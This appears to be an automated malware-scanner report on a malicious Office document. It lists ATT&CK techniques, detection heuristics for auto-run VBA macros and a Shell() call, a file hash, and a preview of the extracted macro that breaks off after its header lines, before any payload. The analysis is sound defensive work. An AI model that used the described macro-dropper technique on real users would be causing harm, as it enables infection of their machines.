Verdict: MALICIOUS (risk score 224)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The file contains VBA macros, including Document_Open and Workbook_Open event handlers, a common technique in malicious Office documents. The critical heuristic firing for a Shell() call in VBA indicates that the macro attempts to execute an external command. While the exact payload is obfuscated, the presence of these elements strongly suggests downloader or dropper functionality. The ClamAV detection further confirms its malicious nature.
Heuristics (7)
- ClamAV: Xls.Malware.Cwsp-6735643-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OLE body):
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/photoshop/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
  - http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14294 bytes |

SHA-256: 2e637f8958cd664bffdf2866d12d8c4c5645eef52999526f4b20595469faa633

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 52 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Sub K_AF()
Dim R_QZ As String